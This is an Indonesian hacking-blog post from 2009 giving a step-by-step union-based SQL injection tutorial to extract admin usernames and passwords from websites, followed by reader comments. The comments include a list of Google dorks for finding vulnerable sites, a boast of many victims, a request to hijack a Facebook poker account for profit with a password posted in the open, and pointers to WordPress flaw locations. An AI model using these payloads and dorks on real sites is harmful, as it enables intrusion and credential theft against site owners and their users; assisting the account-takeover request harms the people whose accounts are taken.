Simple Blind SQL Injection Method

14 November 2009
Penulis: d3r1lo1o1 · Kategori Artikel: Hacking

Simple Blind SQL Injection Methode V4 Tutorial
Langkah Pertama:

Find the target
ex: /news.php?pid=1

Add character ‘ at end of url to find error message.
ex: /news.php?pid=1′ atau

===========
=step two=
===========

find and count to amount the table in database.
use the command : order by

es: [site]/news.php?pid=-1+order+by+1–

chek step by step…
misal: /news.php?pid=-1+order+by+1–
/news.php?pid=-1+order+by+2–
/news.php?pid=-1+order+by+3–
/news.php?pid=-1+order+by+4–

so it appears error message or missing error…
ex: /news.php?pid=-1+order+by+5–

so that we take is up to number 4
ex: /news.php?pid=-1+order+by+4–

============
=step three=
============

for show the numbers that appear use the union
coz it error until 5
do this: /news.php?pid=-1+union+select+1,2,3,4–

=============
=step four:=
=============

find the tabble
you can use your logic
example the table is
admin, admins, login, logins, user, users

use command +from+(table_name)–

ok do this
ex : /news.php?pid=-1+union+select+1,2,3,4+from+admin–
if not have error

and you can see the number is appear for example 2
go to the next step

============
=step five=
============

find the username & peassword coloumn
for username
use ur logic again
example:
user, usr, username, user_name, login, user_admin, name, admin_user, and etc

last number 2 is appear
do this
ex : /news.php?pid=-1+union+select+1,username,3,4+from+admin–

example appear : admin
admin is username

for password
use ur logic again
example:
password, pswd, passwd, pass, pwd, kunci, masuk, sandi, and etc

ex : /news.php?pid=-1+union+select+1,password,3,4+from+admin–

example appear : 123456
123456 is password

===============
=step six:=
===============

ok in the last step you must find admin page

ex : website.com/admin

sorry bhs inggris hehehehe..

=====================
: Special thx to :
Allah SWT

: My teacher :
vyc0d, Gonzhack
=====================
: thx to :
MR.FRIBO, DHIYAT, BOBYHIKARU, N4CK0, RAJEZ, AZZURE,SICK_HACKER, mas UTUH
AA EZHA, crusdd2, DIMAZ,DUDULS, slalu_ngantuk,ku51_g0y4n9 & BEJAMZ
: thx for the team :
N.G.U TEAM, CYBERDOS TEAM, HACKER NEWBIE TEAM, XPGROUND TEAM, DEVILZC0DE, TECON CREW, IDC
=====================

Tags: Blind SQLI, Hacking, Sql Injection

Komentar

20 Komentar Untuk “Simple Blind SQL Injection Method”
Silahkan Berikan Tanggapan Anda Untuk Artikel Ini...

suicidal pada 18 November 2009 5:47 am

dah bnyk korban gw kok..
masih bnyk web yang bugs kyk gni..

dork nya nih..

inurl:”id=” & intext:”Warning: mysql_fetch_assoc()
inurl:”id=” & intext:”Warning: mysql_fetch_array()
inurl:”id=” & intext:”Warning: mysql_num_rows()
inurl:”id=” & intext:”Warning: session_start()
inurl:”id=” & intext:”Warning: getimagesize()
inurl:”id=” & intext:”Warning: is_writable()
inurl:”id=” & intext:”Warning: getimagesize()
inurl:”id=” & intext:”Warning: Unknown()
inurl:”id=” & intext:”Warning: session_start()
inurl:”id=” & intext:”Warning: mysql_result()
inurl:”id=” & intext:”Warning: pg_exec()
inurl:”id=” & intext:”Warning: mysql_result()
inurl:”id=” & intext:”Warning: mysql_num_rows()
inurl:”id=” & intext:”Warning: mysql_query()
inurl:”id=” & intext:”Warning: array_merge()
inurl:”id=” & intext:”Warning: preg_match()
inurl:”id=” & intext:”Warning: ilesize()
inurl:”id=” & intext:”Warning: filesize()
inurl:”id=” & intext:”Warning: require()
stinky pada 22 November 2009 3:51 am

kak tlng kirimkan video hacking sql injaction dan cara caranya.coz gw masih bingung.kok examplenya news.PhP?Pid=1 itu ulr apaan ya .Maklum msh newbie

kirimkan ke email ku budimetal93@yahoo.com
rifki oke pada 7 December 2009 3:12 am

broooo……CMS wordpress bisa di sql injection ngk????

klo bisa kasi tw cara ny dun9??????hehehehehehe

salam. . . .
d3r1l_o1o1 pada 9 December 2009 9:39 pm

@stinky
ok bro tar ane kirimin ke email ente

@rifki oke
bisa ko justru kebanyakan pake SQLi tapi nge decript hashnya susah bro hehehee
FedEx MiLDNeT pada 10 December 2009 8:11 am

pak de bius…ajarin inject site https dunk
d3r1l_o1o1 pada 11 December 2009 2:08 am

emang https bsa di inject y? stau ane sih g bsa
UtuH pada 12 December 2009 1:35 am

@d3r1l: https bisa di inject kok, asalkan ada vuln pada konteks php server / systemnya there is no need. https itu cuma untuk pengirimian data yg di enkripsi supaya lebih aman. gak ada spy di perjalanan data.
Gambit pada 26 December 2009 7:25 am

mas, bisa minta tolong dihackin account fbku gak, biar chip pokernya tambah banyak, soalnya ditempatku jualan chip tu rame bgt, nanti aku bagi deh hasilnya, transfer duit gitu, lumayan lho mas, 1B tu laku 7 jutaan, gimana?ada aja aku pembelinya, pokoknya chip ada, uang gak pernah susah….berminat? hubungi aja emailku: mikael_4ngello@yahoo.co.uk

account fbku
cute_casper91@yahoo.ca
passwordnya : gundhabagus

nanti kalo udah jadi, kasih tau lewat sms, 081359772416,
sesama bisnis internet saling percaya aja…
tolong mas, aku lagi BU(butuh duit)
kasih aja 2B, nanti aku kasih 7 jt, gmn?
pokoknya masukin dulu chipnya,
ganti passwordnya, abis tu sms detailnya…

balesan aku tunggu di mikael_4ngello@yahoo.co.uk
jafar pada 27 December 2009 3:51 am

blur,,,, sumpah ajarin w step by step dong…. kirim ke email w yah,,,, w lagi ada tugas tentang hacking nih dari dosen w,tpi pake SQL injections,,,, nieh email w jafar0n7@gmail.com
init0 pada 4 January 2010 12:27 pm

@d3r1l_o1o1
hiks.. hiks..
setau ane sih, wordpress versi 2.2 kebawah yng bisa diinject,
bug ny ada di file
/wp-admin/admin-ajax.php ,

mulai dari versi 2.2 keatas kykny blum ktemu bug sqli nyh .
klo wordpress versi 2.3 smpet ada bug xss aja di file :
/wp-admin/edit-post-rows.php

utk https bner kt omz utuh , https itu cuma pengirimian data ny aja yg di enkripsi ,
jd ga bisa di sniff a.k.a ngintip pke wireshark , klo sqli ya ttep bisa, coz sqli kn bug ny di aplikasi web nya , bukan di server

*CMIIW*
UtuH pada 4 January 2010 5:03 pm

@Init0: Yooo..
WP juga bs di SQLI sebenernya, cuman berhubung communitas codernya banyak. jadi cepet update sama releasenya.

Info kelemahan WP sebenarnya ada di:
http://core.trac.wordpress.org

Ini sebenernya rahasia, tapi gpplah buat berbagi anak” binushacker. Wkwkwkw..
Enjoy & eat it!
blitZerlamer pada 5 January 2010 8:56 am

“Keingintahuanku adalah sebagian dari kejahatanku”tp hatiku terlalu lembut untuk merusak.aq hanya ingin tahu…
d3r1l_o1o1 pada 16 January 2010 1:52 am

tuh udh di jawab sama bang utuh hehehe.. ane mah masih g bsa apa2 ane juniornya mas utuh
irham pada 25 January 2010 6:22 pm

om ajarin aku dund, cz aq msh newbie bngt nh,, and bg aku video and tutorial’a jg dund,, kirim za ke irham_21@yahoo.co.id trims y om
keeppix pada 5 February 2010 7:50 am

minta tutz sqli dunk kk master…

keeppix@gmail.com
asduk pada 5 February 2010 11:03 am

taek campur-taek campur
d3r1l_o1o1 pada 22 February 2010 4:23 am

nih video buat v5 v4nya menyusul y hihihihi

http://www.facebook.com/video/video.php?v=1276289680629
kingkong pada 3 March 2010 6:20 am

hacking hacking

aku suka belajar hacking

tapi g mudeng2 …

hacking hacking …

dhuwur dewe ..

tengkiu tutorialnya sob
ceng ho pada 14 March 2010 8:47 am

y elah… susah amat yak?

cara perlahan dong master? kirim ke liveniping@yahoo.com ya
Toggog78 pada 21 March 2010 12:36 am

bisa minta bantuannya uh gw harap trimood meed TOKE bisa habis, oiya gw punya akun Fb : facebook_apps_zynga@cyber-wizard.com
ini akun khusus main poker hasilnya buat mendirikan CampsJakarta “Rumah Singah Di Jakarta” Untuk mereka yang dari daerah dan hal lain bermuatan sosial murni di garis balik tirai bambu